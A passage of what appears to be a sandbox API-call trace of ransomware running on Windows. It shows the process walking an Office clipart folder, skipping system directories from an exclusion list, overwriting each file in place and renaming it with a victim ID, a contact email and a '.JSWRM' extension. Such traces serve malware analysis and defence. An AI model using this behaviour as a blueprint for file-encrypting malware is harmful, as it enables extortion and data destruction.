hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0088.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0088.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0088.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0088.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0088.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.139] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8ad6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0227419.JPG", cAlternateFileName="")) returned 1 [0088.139] lstrcmpiW (lpString1="J0227419.JPG", lpString2=".") returned 1 [0088.139] lstrcmpiW (lpString1="J0227419.JPG", lpString2="..") returned 1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="...") returned 1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="windows") returned -1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="recovery") returned -1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="perflogs") returned -1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="documents and settings") returned 1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="system volume information") returned -1 [0088.140] lstrcmpiW (lpString1="J0227419.JPG", lpString2="msocache") returned -1 [0088.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0088.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227419.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227419.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0227419.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0088.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227419.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227419.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0227419.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0088.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.141] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35542) returned 1 [0088.141] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8ad0) returned 0x24d210 [0088.141] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8ad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8ad0, lpOverlapped=0x0) returned 1 [0088.145] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.145] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8ad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8ad0, lpOverlapped=0x0) returned 1 [0088.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.146] CloseHandle (hObject=0x314) returned 1 [0088.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0088.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0088.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0088.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0088.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.147] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0088.148] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe2e9, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0227558.JPG", cAlternateFileName="")) returned 1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2=".") returned 1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="..") returned 1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="...") returned 1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="windows") returned -1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="recovery") returned -1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="perflogs") returned -1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="documents and settings") returned 1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="$RECYCLE.BIN") returned 1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="system volume information") returned -1 [0088.148] lstrcmpiW (lpString1="J0227558.JPG", lpString2="msocache") returned -1 [0088.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227558.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227558.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0227558.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227558.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0227558.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0227558.JPG", lpUsedDefaultChar=0x0) returned 12 [0088.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.149] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=58089) returned 1 [0088.149] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe2e0) returned 0x24d210 [0088.150] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xe2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xe2e0, lpOverlapped=0x0) returned 1 [0088.155] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.155] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xe2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xe2e0, lpOverlapped=0x0) returned 1 [0088.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.156] CloseHandle (hObject=0x314) returned 1 [0088.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0088.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0088.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0088.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0088.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.157] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.157] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x65a6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0228823.WMF", cAlternateFileName="")) returned 1 [0088.157] lstrcmpiW (lpString1="J0228823.WMF", lpString2=".") returned 1 [0088.157] lstrcmpiW (lpString1="J0228823.WMF", lpString2="..") returned 1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="...") returned 1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="windows") returned -1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="recovery") returned -1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="perflogs") returned -1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="documents and settings") returned 1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="system volume information") returned -1 [0088.158] lstrcmpiW (lpString1="J0228823.WMF", lpString2="msocache") returned -1 [0088.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228823.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228823.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0228823.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0088.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228823.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228823.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0228823.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0088.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.159] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26022) returned 1 [0088.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x65a0) returned 0x24d210 [0088.160] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x65a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x65a0, lpOverlapped=0x0) returned 1 [0088.163] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.163] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x65a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x65a0, lpOverlapped=0x0) returned 1 [0088.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.163] CloseHandle (hObject=0x314) returned 1 [0088.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0088.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0088.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0088.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0088.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0088.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.164] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0088.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.164] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec9380a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x918c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0228959.WMF", cAlternateFileName="")) returned 1 [0088.164] lstrcmpiW (lpString1="J0228959.WMF", lpString2=".") returned 1 [0088.164] lstrcmpiW (lpString1="J0228959.WMF", lpString2="..") returned 1 [0088.164] lstrcmpiW (lpString1="J0228959.WMF", lpString2="...") returned 1 [0088.172] lstrcmpiW (lpString1="J0228959.WMF", lpString2="windows") returned -1 [0088.172] 